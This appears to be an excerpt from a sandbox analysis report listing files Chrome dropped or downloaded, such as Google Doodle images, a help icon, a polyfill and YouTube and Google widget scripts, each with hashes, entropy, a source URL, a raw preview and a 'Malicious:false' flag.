                                                                                                                                                                                                                                                            Preview:GIF89a............8..i..F.kh...Lt.(m...F..E..wNp...3.r.n....M...SF..2.........1r..D....yw.$..T....h....q...U....5e.......3...Ge.....I.....f.X.JB..7..v..Z.....7..E.iRy.2..l_....7S...s7....#..n..."..Um.#......T..........B..Iy.0...V...e1...n...5G......WU.(9......$.G...\....5..,..'..w..j..-.u.6.. .j.#..$.cV...@....-.85...j...B.v..........ls.*..T.u.Te]J.t.....T....p....g......5?X.F..?1...B.....N..I.."..BU...B;......U/.5..Y....k.v>..;........:.......xx..G.......f.9..[..F.......4..X..[..$..............SF..f.....U9uJ..B?a..vZ."...R.......T..............T....k.)..Z..z.......ZL..1..m.6.`j..=.."..|....Q....".9BT.....B.M......"Z...^_............I........................................... .......................................S.....!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 6.0-c005 79.164590, 2020/12/09-11:57:44 "> <rdf:RDF xmlns:rdf="ht
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):401
                                                                                                                                                                                                                                                            Entropy (8bit):4.740133908247468
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:tvcmdU/i3tLIsKd2aCJNfOQxNVtd7Svq6JwCA7V:tk2U/i3tv46vxNdSvqCw9V
                                                                                                                                                                                                                                                            MD5:E2DBF6370751567D561BB64649CB3342
                                                                                                                                                                                                                                                            SHA1:42792B6B81D2386B95F295CA7473C929CFE4FB0C
                                                                                                                                                                                                                                                            SHA-256:C1BD37E48A2AFA7523AED613951F5411A03DC1597344A9639DDAA4EFF32F0D7E
                                                                                                                                                                                                                                                            SHA-512:792FABC52F0D9DC8BDAC569C0AED7C6B61C29293B8EE43C62A50533F23EFE440C9EB4B34393D3BA82CBB32A99F43EA16ABBE2B187F9A88E013579194C43B4178
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:<svg id="help" width="24" height="24" viewBox="0 0 24 24" xmlns="http://www.w3.org/2000/svg"><path fill="#5f6368" d="M12 2C6.48 2 2 6.48 2 12s4.48 10 10 10 10-4.48 10-10S17.52 2 12 2zm1 17h-2v-2h2v2zm2.07-7.75l-.9.92C13.45 12.9 13 13.5 13 15h-2v-.5c0-1.1.45-2.1 1.17-2.83l1.24-1.26c.37-.36.59-.86.59-1.41 0-1.1-.9-2-2-2s-2 .9-2 2H8c0-2.21 1.79-4 4-4s4 1.79 4 4c0 .88-.36 1.68-.93 2.25z"></path></svg>.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 64 x 64
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):111830
                                                                                                                                                                                                                                                            Entropy (8bit):7.886479791646624
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:gSEro86gVAGuUJ6m7WLe3KKcj1zG/lHoTSV0fk:dEro86gVAORL3KKc5kIWac
                                                                                                                                                                                                                                                            MD5:CAD066AA5000D5318EC2AEB1FF09FC92
                                                                                                                                                                                                                                                            SHA1:874E026942B1621477EC77C0DC2443B8222E19D5
                                                                                                                                                                                                                                                            SHA-256:F1C19DEF8ABE99D6E922755FC028D2CF35BF3419B020D7F955F1C202D2C7936C
                                                                                                                                                                                                                                                            SHA-512:F2C27B8CA39131DC749A3764D58390D581312F440621AFBB19B212F54D8F946D344FC2FFC9A890C40885062C3AD6DBA73688E0AFE8CF32392BA0ECDE0B5F3276
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a@.@..........!..NETSCAPE2.0.....!.......,....@.@...............................<..&..............................,....B..1.....<...... ..%..!..............-l.ah.q}.R..3..'..$..7..9....I.....6...........1..0a.\..O.n..C..'..Eu.K..3.......5..@..,M....Zy.I]....E...J..U.f....)p.S...R...'..-...i.Q. ..$...........<..1..5.....O.~K..N..K..K....v.....Q..y.Yc..K.v..ur.M..C....<....~..-b.T..5U..E...U..V.`r.Uu._.....2L..T.s............x..j....S..._....[....B......{.........c.t....2..z].e....[.y.........k.I..?X._U..c.i.....WU.....O..p.a..r.........R....-..Sy.Vv.G..JW......U{.Kn.t~.Gt.^..M..J....}p.}.....|.D.,.....0..h......)..2...i.u..L..2..g...........?..h........n....X..........>.....|..................o.m.........n...V.x..M..V....N...............X{.Oj.sj.s......H......*\....#J.H....3R.e........I....Y2.I^Kv.x...C6..V...!q.$h.......%p..K.*..!..4...OL(@6u"....<.....&..BT.B...+.`q.!..Wj.&........\...U^..T......!"<.b......m
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 1132 x 400
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):277546
                                                                                                                                                                                                                                                            Entropy (8bit):7.931793869156116
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6144:+u1aozUEskNJ7R1jRw8EEDzHGxt0zT/aqy32jRVhN:HJ35rRpPmx0Cn34hN
                                                                                                                                                                                                                                                            MD5:2953702138EF78AF5807B730EE27D212
                                                                                                                                                                                                                                                            SHA1:E6D3EADC788392182AFA4BABE082A6FA91585249
                                                                                                                                                                                                                                                            SHA-256:02FC6B66789F2706AEC5239ABDE0FDBFF47853AA1300CCEA4090CFE89C6F98A3
                                                                                                                                                                                                                                                            SHA-512:962DEF5153FCB9E22E400B33DCCAB689B49CACC9826C604BFF1C6D2A19F962538B52F8B1D33B39BE4D831161E3A1ADE7DD60A0D712E79C4A23942D0693B708BF
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2018/spring-equinox-2018-5263345362927616-2xa.gif
                                                                                                                                                                                                                                                            Preview:GIF89al......W.R.u.{GI.n....R...0.m.....m.....C....]...R'.m..a....s..d..K..X.......t....ZY...GBal...O.........r...................l...........................r................s.....N...St..v.....i....k...........s.h...L........m.............................i........ccu...........Z..X.......=.......y....l...q.........C.............f.......o.............R.r........Z.....u....{d.......B...u........U...*..B.|..X.Wg.k..^?..}...........F...`{...........}qz.._.s>9....k....h......^.....L<..X.ig...T...............(.......y.SZ...{b.].[.....@....a:..A...`EN...............q.`.............x......2................................:............................................1..2.....:.................2..K.......!..NETSCAPE2.0.....!...*...,....l...@...C..H......*\....#J.H....3j.... C..I...(S.\...0c.I.....8....s...J...H.*]...P.J...RVK...+.....lV..Rs.]...p..K.f..W.x..wk.R...[.p....pX.8..*.?$.c...3k....$.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (437)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):599
                                                                                                                                                                                                                                                            Entropy (8bit):5.009651807290181
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:12:UeWiXrnO+ceUi0VfB7+7bl7dR/7rjE87k7Xv0X7xZWRnPfkQ:tWgrnOy5uqtH/pI7u1ZWREQ
                                                                                                                                                                                                                                                            MD5:90C2B5A3D3359B746681DAF8427D4A97
                                                                                                                                                                                                                                                            SHA1:F4491E04A2A587308E5081E1241979698C9FE285
                                                                                                                                                                                                                                                            SHA-256:89668BE203725CDD25B03ADB99978CAEF2C20BC8936A47263E612FA9715491C3
                                                                                                                                                                                                                                                            SHA-512:63510E01EF5C3251442742AE5EDCCA8F674D02B29A888DFEE90BD06F1D7B0D25CF8826AA4966FDF7B33A1F9F8255E8F7E34AF09BEC2CF81ECEA4721ED1C2EED8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/glue/polyfill.min.js
                                                                                                                                                                                                                                                            Preview:/**. * @fileoverview Glue Polyfill for IE11.. */..(function(){./*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.window.NodeList&&!NodeList.prototype.forEach&&(NodeList.prototype.forEach=Array.prototype.forEach);Element.prototype.matches||(Element.prototype.matches=Element.prototype.msMatchesSelector||Element.prototype.webkitMatchesSelector);Element.prototype.closest||(Element.prototype.closest=function(b){var a=this;do{if(Element.prototype.matches.call(a,b))return a;a=a.parentElement||a.parentNode}while(null!==a&&1===a.nodeType);return null});.}).call(this).
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (762)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):1256
                                                                                                                                                                                                                                                            Entropy (8bit):5.281661232255651
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:kWfSfvirse1KY+CuDuVcB/SDFTI9+aonepp7siVEEJlSr2OOKeVZgqrky:ZfSfveEhtiZuToezLlJEr8KaZgqrky
                                                                                                                                                                                                                                                            MD5:E769DF86FD47DAF933E81F7D292C6240
                                                                                                                                                                                                                                                            SHA1:01EB5FF0CDAD2F15485EA137AFC99E9D58041A5F
                                                                                                                                                                                                                                                            SHA-256:FE74A96B85ADC8D99058A0A5CAF5CED8ABC0151D2FC0E46B509E5BA343AD1E4B
                                                                                                                                                                                                                                                            SHA-512:F257345380AD2410443D8A73BD80D15CA2CB2F6CBE1F2422979CB76352DC3EE1AD01270A1CAD67F8A906E153EA387C985F7005846CF87CC0060CC238C5BE6DA9
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.DLVh3rihYK8.es5.O/ck=boq-one-google.OneGoogleWidgetUi.xIgYPDjrJ0Y.L.B1.O/am=gNcGAAAE/d=1/exm=A7fCU,BVgquf,COQbmf,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KG2eXe,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,PrPYRd,QIhFr,RMhBfe,SdcwHb,SpsfSb,U0aPgd,UUJqVe,Uas9Hd,Ulmmrd,V3dDOb,VwDzFe,XVMNvd,Z5uLle,ZfAoz,ZwDk9d,_b,_r,_tp,aW3pY,aurFic,byfTOb,e5qFLc,fKUV3e,gychg,hKSk3e,hc6Ubd,hnN99e,kWgXee,kjKdXe,lazG7b,lsPsHb,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,ovKuLd,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yDVVkb,yYB61,zbML3c,zr1jrb/excm=_b,_r,_tp,calloutview/ed=1/wt=2/rs=AM-SdHvKPgeuANF_DFsbYkEVpPrE38ImwA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;xqZiqf:wmnU7d;zxnPse:GkRiKb;EVNhjf:pw70Gc;NSEoX:lazG7b;JsbNhc:Xd8iUd;oGtAuc:sOXFj;eBAeSb:zbML3c;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;pXdRYb:MdUzUe;nAFL3:s39S4;iFQyKf:QIhFr;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=bm51tf"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.p("bm51tf");.var yma=function(a,b,c,d,e){this.l=a;this.s=b;this.o=c;this.H=d;this.T=e;this.i=0;this.j=GW(this)},zma=function(a){var b={};_.Pa(a.Br(),function(e){b[e]=!0});var c=a.rr(),d=a.ur();return new yma(a.nq(),1E3*c.getSeconds(),a.lr(),1E3*d.getSeconds(),b)},GW=function(a){return Math.random()*Math.min(a.s*Math.pow(a.o,a.i),a.H)},HW=function(a,b){return a.i>=a.l?!1:null!=b?!!a.T[b]:!0};var IW=function(a){_.O.call(this,a.qa);this.l=a.service.Ds;this.o=a.service.metadata;a=a.service.TF;this.j=a.l.bind(a)};_.E(IW,_.O);IW.oa=_.O.oa;IW.ha=function(){return{service:{Ds:_.EW,metadata:_.AW,TF:_.WU}}};IW.prototype.i=function(a,b){if(1!=this.o.getType(a.Bb()))return _.Ho(a);var c=this.l.i;(c=c?zma(c):null)&&HW(c)?(b=JW(this,a,b,c),a=new _.Go(a,b,2)):a=_.Ho(a);return a};.var JW=function(a,b,c,d){return c.then(function(e){return e},function(e){if(!e.status||!HW(d,_.gl(e.status,1
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (509)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):992
                                                                                                                                                                                                                                                            Entropy (8bit):5.297935948442275
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24:E1XXIbtEHvIYWwmqAK/HJ2TAXzK5vuHM8aJLtdRWZ4FhQ:E1XXmtEPT6cSAXW5kaJLzwYhQ
                                                                                                                                                                                                                                                            MD5:E882B462546A656F9820ADFF1FB15A81
                                                                                                                                                                                                                                                            SHA1:8554065B121F3A0F663CC009CE7F82E07370ABD5
                                                                                                                                                                                                                                                            SHA-256:7AC1E3E9A56D93D8F406EF31B9B234B0E44F1F5BB75200B08DAAB11CDF893C53
                                                                                                                                                                                                                                                            SHA-512:E9C37F13AD080B91108EB6C9550268B734B16D06F8CD469F34852FBF35A20D709494ED69403CB444D7BA4690565B3964897B2D1D379AE14196FF24016579F73A
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.youtube.com/iframe_api
                                                                                                                                                                                                                                                            Preview:var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/59acb1f3\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};.if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.push(f)};window.onYTReady=function(){YT.loaded=1;for(var i=0;i<l.length;i++)try{l[i]()}catch(e$0){}};YT.setConfig=function(c){for(var k in c)if(c.hasOwnProperty(k))YTConfig[k]=c[k]};var a=document.createElement("script");a.type="text/javascript";a.id="www-widgetapi-script";a.src=scriptUrl;a.async=true;var c=document.currentScript;if(c){var n=c.nonce||c.getAttribute("nonce");if(n)a.setAttribute("nonce",n)}var b=.document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})()};.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:GIF image data, version 89a, 748 x 340
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):988581
                                                                                                                                                                                                                                                            Entropy (8bit):7.951315128731031
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:24576:g3le66J3Y3Vl8vrqbwOqA61n/lDtzktnkNcH9Jg:g3aBCmrqbYl4kNo9q
                                                                                                                                                                                                                                                            MD5:B1F180994C218A5502775661978104B0
                                                                                                                                                                                                                                                            SHA1:207833EAB66B6D34B5626FCE4338A870B691E1F4
                                                                                                                                                                                                                                                            SHA-256:0E37829AF2ED566CA2147A5514D499039BE876C42BE30A4BB5527E867CD5428A
                                                                                                                                                                                                                                                            SHA-512:5C82A20A6AD03355B45D34C05960D2878283B4423BC3498FB62963766970ECBA9AEFB4DCBA5448618C444FC37A0CAB1452F7E217896C1C016E38654359093BB8
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            Preview:GIF89a..T....s..R.c...e.mKsi...k{cZR8k...ljZ{..kjlx...z..s......j........qlX...s..oR2.kL........t........d.....2).dZD...d..............Z.nMLG{....ex..JxZ.yT...J<$........m.......Y...n........v....j...s..{......z...?CD..\...~c...V\dsbC.aG...BB6.}y...R.Z.....s.......99;k.....^?......s........}..}..{.......................D;;......~..s..................k..........cc...!..NETSCAPE2.0.....!..XMP DataXMP<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?> <x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 9.0-c000 79.da4a7e5ef, 2022/11/22-13:50:07 "> <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"> <rdf:Description rdf:about="" xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/" xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#" xmlns:xmp="http://ns.adobe.com/xap/1.0/" xmpMM:DocumentID="xmp.did:DEC8955DBA2E11EDA83BEBBA0CD46A92" xmpMM:InstanceID="xmp.iid:DEC8955CBA2E11EDA83BEBBA0CD46A92" xmp:CreatorTool="Adobe Photoshop 2023 M
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (511)
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):6122
                                                                                                                                                                                                                                                            Entropy (8bit):5.4547765170030065
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:96:UEdhFkZUeaSGfRBF2jtTBkhAGW3wl6hQxHLBb+pKP6uMDWjqyrtiobnd3ATMeL/n:TdhFnQutCs6hQx9+pKCcmyrjKMeLP
                                                                                                                                                                                                                                                            MD5:FB87C3D2BC58C37C30122DE430A0EA70
                                                                                                                                                                                                                                                            SHA1:66FF0F0D2703FED3CB9D23380329442C598E14D1
                                                                                                                                                                                                                                                            SHA-256:4A2645231E15E57BE5A201AD945730D7CC15CF257AAD77192B7ECEFC50C18831
                                                                                                                                                                                                                                                            SHA-512:7B9F8AE2ED3844FB678F41CEDD8F5122DF804736DFED570F3105EC657C7BD8161D947A5211358E6C0CA7F2750B6DEC85FA728B1C47400D1E4CBBD9E760907BA0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:"https://www.gstatic.com/_/mss/boq-translate/_/js/k=boq-translate.TranslateWebserverUi.en.t7_VRwG1YCg.es5.O/ck=boq-translate.TranslateWebserverUi.3Kpn12MAoRc.L.B1.O/am=gemZDQsCAQg/d=1/exm=A7fCU,AJZZxc,AKLKy,AV6dJd,BSwBZd,BVgquf,CHCSlb,COQbmf,CTfTTd,CW8lw,DFTXbf,E2VjNc,EEDORb,EF8pe,EFQ78c,FZTbYc,G0j0Je,GILUZe,GSlykd,GiFjve,Gkrb3e,HgVFRb,HruX3d,HwavCb,I6YDgd,IZT63,Id96Vc,IjTJJb,Izs65d,JE2clc,JH2zc,JNcm2e,JNoxi,JPvYpc,JVNQkc,JWUKXe,K4PcAe,KG2eXe,KOuY1b,KUM7Z,L1AAkb,LEikZe,LFynkb,LP4cEc,M2suMc,MDB2J,MI6k7c,MJWMce,MY2OBe,MaBk4,Mlhmy,MnwvSb,MpJwZc,N2mfec,NotTJb,NufREb,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6Sgne,PJgxJf,PrPYRd,QIhFr,QKK0O,Qnj3Pe,QqJ8Gd,R6UQsc,RAnnUd,RMhBfe,RqjULd,Ru0Pgb,SNtCZb,SdcwHb,SpsfSb,T8kZcd,TJQ3Ud,Tpj7Pb,TzmfU,U0aPgd,UECOXe,UUJqVe,UWMmZb,Uas9Hd,UfGXTd,Ulmmrd,Un38xf,UthHZe,V3dDOb,V8JnLd,VETAO,VNcg1e,VwDzFe,WCciof,WO9ee,WYNSOe,XBRlNc,XMsnSd,XVMNvd,Xn16n,YrN4Fb,ZH8ved,ZbunN,ZfAoz,ZwDk9d,_b,_r,_tp,a4GDlb,aW3pY,aurFic,bD99Db,bTi8wc,bYHiff,bm51tf,byfTOb,cPVRG,ceo3ne,dmy0Zb,duFQFc,eM1C7d,eYJrS,ehH0Pd,fKBXPe,fKUV3e,fR6Vdb,ff8rzd,fmklff,g8fAWe,gJzDyc,gWGePc,glibvb,gychg,hB8iWe,hKSk3e,hPAkKe,hc6Ubd,hmxKAd,i5dxUd,j4UNFc,jMem0b,jl0Zdc,kWgXee,kjKdXe,lWpni,lazG7b,lsjVmc,lwddkf,m9oV,mI3LFb,mNvcvf,mdR7q,mmcjze,mzzZzc,n391td,n73qwf,nKuFpb,onWwzb,ovKuLd,p8L0ob,pKzUve,pjICDe,pvoWvc,pw70Gc,q0xTif,qRXAtf,rCcCxc,rPRh8e,rQ304,rSlV0d,s2VbJb,s2XCRc,s39S4,sGhhBd,sJhETb,sOXFj,soHxf,t1sulf,tQX3bd,tQbu0,tjiVBd,u8fSBf,uD1GC,uu7UOe,w9hDv,ws9Tlc,xQtZb,xUdipf,xdp6Ne,xuEY0,xzbRj,yDVVkb,yi1Dad,zbML3c,zr1jrb/excm=_b,_r,_tp,mainview/ed=1/wt=2/rs=ANkVxDlgUx_pEh_72ZiUbycS92nBrlu9eA/ee=cEt90b:ws9Tlc;QGR0gd:Mlhmy;uY49fb:COQbmf;yxTchf:KUM7Z;qddgKe:xQtZb;dIoSBb:SpsfSb;EmZ2Bf:zr1jrb;EVNhjf:pw70Gc;eBAeSb:zbML3c;yEQyxe:p8L0ob;JsbNhc:Xd8iUd;NSEoX:lazG7b;zxnPse:duFQFc;pXdRYb:XBRlNc;oGtAuc:sOXFj;wQlYve:aLUfP;g8nkx:U4MzKc;Pjplud:EEDORb;io8t5d:yDVVkb;Oj465e:KG2eXe;Erl4fe:FloWmf;ul9GGd:VDovNc;sP4Vbe:VwDzFe;a56pNe:JEfCwb;kMFpHd:OTA3Ae;NPKaK:SdcwHb;nAFL3:s39S4;iFQyKf:QIhFr;kbAm9d:MkHyGd;xqZiqf:BBI74;SNUn3:ZwDk9d;LBgRLc:SdcwHb;wR5FRb:O1Gjze/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                                            Preview:"use strict";this.default_TranslateWebserverUi=this.default_TranslateWebserverUi||{};(function(_){var window=this;.try{._.k("Wt6vjf");.var Mu=function(a){_.B.call(this,a)};_.C(Mu,_.B);Mu.prototype.wb=function(){return _.ej(this,1)};Mu.prototype.Yc=function(a){return _.x(this,1,a)};Mu.Ad="f.bo";var Nu=function(){_.Ql.call(this)};_.C(Nu,_.Ql);Nu.prototype.vb=function(){this.UB=!1;doa(this);_.Ql.prototype.vb.call(this)};Nu.prototype.i=function(){eoa(this);if(this.Mq)return foa(this),!1;if(!this.AD)return Ou(this),!0;this.dispatchEvent("p");if(!this.mz)return Ou(this),!0;this.nx?(this.dispatchEvent("r"),Ou(this)):foa(this);return!1};.var goa=function(a){var b=new _.pr(a.cN);null!=a.iA&&b.j.set("authuser",a.iA);return b},foa=function(a){a.Mq=!0;var b=goa(a),c="rt=r&f_uid="+_.oh(a.mz);_.sn(b,(0,_.Kf)(a.j,a),"POST",c)};.Nu.prototype.j=function(a){a=a.target;eoa(this);if(_.vn(a)){this.Gv=0;if(this.nx)this.Mq=!1,this.dispatchEvent("r");else if(this.AD)this.dispatchEvent("s");else{try{var b=_.wn
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):20226
                                                                                                                                                                                                                                                            Entropy (8bit):7.9889970744842165
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:384:LLt2tLM9wvD+jaNOG8f4LDDstt0t8+qfmZHa+ooXRS+ZBL7+uPc:LLwtUwvca84LDUb+q+ZxoohSaBPj0
                                                                                                                                                                                                                                                            MD5:8D34A2317BF5B31D7FEF1F5987B4C7A1
                                                                                                                                                                                                                                                            SHA1:35C942FF50F501B0C59E9057CB2997F7C4603E03
                                                                                                                                                                                                                                                            SHA-256:5C19D5D0F9F04C628ED9D8253F9AC046570F6745E815E585F4C292A3C9F5CBB7
                                                                                                                                                                                                                                                            SHA-512:FD87D4BC6E631DC04C27F92591D32EFD8D08AE48302303B4C27EAA4F83B005E32BADE5D7BE5B4091C99F891494EAAF59E836199626D6655E779085263150A9F0
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.gstatic.com/marketing-cms/19/46/2e0b963a4d0c8839d25c37f25a0b/banner-mb.webp
                                                                                                                                                                                                                                                            Preview:RIFF.N..WEBPVP8X........c..s..ALPH......D...V...d-.p.f.....4.Pg.Nl.,..'k....G..#.H.I.#y".kw.suF..u.....P.....8..h.m...%*..:...^.......2...Zd.+.@d<...+.Ld.+....nkc.i...;...wNv.\j r.. ....Xw_..%w.*B.P...|.M...@.C_. .4@...L..]...t.fj....i...C 1Pt...k..-.V.PQ;..`...8\Xp..iK..2..d.4......I.y..X}R...Ck9....N.-.....\.4.D...N.Zx7JfT...*..B.%..P..bN.Nc../....j..2..;/c......Q..1..:........:;-...:.IM.x7...(..S/ ..MP......=.;'...x0...l.i.*..5..@.O(.f.!.qrS.i"H...+.4d.-.,.xj'../#..k729........S.............b...l2.<..iO..f....kf.t,}9.@j.N...@.|....2..q..<..YS_...r`....q.....W,.=...u....sx......5.J....(.8...x..*...$e...!i...W..|.....d..,....Dlv..a..r..Apr<.......*.%z..Ikz|x4;=c=.,8>..........n..%.<..E.O.....C3.6.....B.D...<....xL......Z.p|.Jp4.....#..*.f.$......1........k;...{`..8..X.......&.d.<.PW......Rf.u.16.g..=<.#..Z/......p......|....`.l...|.........p2..z.....M..3.Rf.p3.'A......1.,.w3...r..3.....!f......}.....}..R!'..S.e....R.. .k^....oc#/.T.P..7
                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                            File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=0], baseline, precision 8, 1000x400, components 3
                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                            Size (bytes):200150
                                                                                                                                                                                                                                                            Entropy (8bit):7.975131381508971
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3072:DrH3o30tLGG7iE+bpi4i2rKLwkt6/24+b63cn2/0TO3j5mZbcLlr9S4+VcE7Ohwd:n3okp4+2rJkt+sbEx/cq7Rr9S4qF7OE
                                                                                                                                                                                                                                                            MD5:C81322618F62B84B4CC43959A5C2EF43
                                                                                                                                                                                                                                                            SHA1:37CEDD7D719DE7E4C7EAB0C4256716D370FBFF67
                                                                                                                                                                                                                                                            SHA-256:CD6DD66B3A52DCAB309971A77BE1F18CFACA575E48EDD455DE3FED5DA166E750
                                                                                                                                                                                                                                                            SHA-512:551F2B97BD21A0849104F1B6ED04CAC712D0B7A883A001D8EB949F0ABC3E28D5534D53235C4FE30EF83F985C0D5E8E56ACFEA5B553308556A05A39055539D2CA
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Reputation:low
                                                                                                                                                                                                                                                            URL:https://www.google.com/logos/doodles/2021/david-warrens-95th-birthday-6753651837108320-2x.jpg
